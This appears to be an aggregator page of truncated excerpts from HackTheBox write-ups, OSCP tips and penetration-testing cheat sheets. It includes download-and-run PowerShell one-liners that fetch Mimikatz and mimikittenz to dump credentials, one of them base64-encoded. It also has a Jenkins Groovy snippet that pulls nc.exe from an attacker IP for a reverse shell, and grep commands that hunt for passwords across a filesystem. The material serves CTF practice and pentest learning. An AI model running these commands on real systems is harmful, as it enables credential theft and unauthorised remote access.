HackTheBox – Granny

This writeup details attacking the machine Granny (10.10.10.15) on HackTheBox. I will write this piece describing as many elements of the process as possible, assuming the reader to be just starting out in the field. Further writeups aren’t going to go into as much detail but if you’re brand new to a lot of these tools, […]

HackTheBox – Chatterbox

HackTheBox – Chatterbox Writeup. Posted on June 16, 2018.

Enumeration: Chatterbox is a pretty simple box and reminds me a lot of something you run across in the OSCP labs. Overall it’s pretty easy, the only sort of tricky part is with privesc if you aren’t familiar with port forwarding. If you follow my Windows […]

Quick-Mimikatz

*NOTE – These pull from public GitHub repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*

#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m

#encoded-mimikatz
powershell -enc <base64-encoded command>

#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1'); Invoke-mimikittenz

#encoded-mimikittenz
powershell -enc SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcHV0dGVycGFuZGEvbWltaWtpdHRlbnovbWFzdGVyL0ludm9rZS1taW1pa2l0dGVuei5wczEnKTsgSW52b2tlLW1pbWlraXR0ZW56Cg==

#puck
powershell IEX […]

HackTheBox – Jeeves

Posted in CTF Challenges on May 21, 2018 by Raj Chandel.

Hello Friends!! Today we are going to solve another CTF Challenge “Jeeves”. This VM is also developed by Hack the Box. Jeeves is a Retired Lab and there are multiple ways to breach into this VM. In this lab, we have escalated root privilege […]

Pure Groovy/Java Reverse Shell

There were so many options but we were interested in Script Console because Jenkins has a very nice Groovy script console that allows someone to execute arbitrary Groovy scripts within the Jenkins master runtime.

https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

def process = "powershell -command Invoke-WebRequest 'http://10.10.14.28/nc.exe' -OutFile nc.exe".execute();
println("${process.text}");

def process = "powershell -command ./nc.exe […]

Reverse Shells with a USB Rubber Ducky

This article discusses setting up a reverse shell payload on a USB Rubber Ducky. A reverse shell is a type of shell in which the infected computer 'dials in' to an attacker's computer. The attacking computer usually listens on a specific port. When the connection is established, the attacking computer is able to […] commands

Practical hacking tips and tricks

Hakluke’s Ultimate OSCP Guide: Part 3 — Practical hacking tips and tricks. Luke Stephens (@hakluke), Mar 31.

Man walks through door with large shadow. OFFENSIVE security logo dramatically appears in a red abyss. So, you’ve finally signed up, paid the money, waited for the start date, logged in to the VPN, and are suddenly hit in the face […]

Other tricks

Post Exploit Enumeration

Search Database passwords in files

grep -rnw '/' -ie 'pass' --color=always
grep -rnw '/' -ie 'DB_PASS' --color=always
grep -rnw '/' -ie 'DB_PASSWORD' --color=always
grep -rnw '/' -ie 'DB_USER' --color=always

File Upload on linux systems via base64 encoding

Converting a file to base64:

cat file2upload | base64

Once the file is converted to base64, you can just create a new file on the remote system and copy the base64 output of […]

Penetration Testing Tools Cheat Sheet

Penetration Testing Tools Cheat Sheet. CHEAT-SHEET, 17 Feb 2017, Arr0way.

Introduction: Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test. For more in depth information I’d recommend the man […]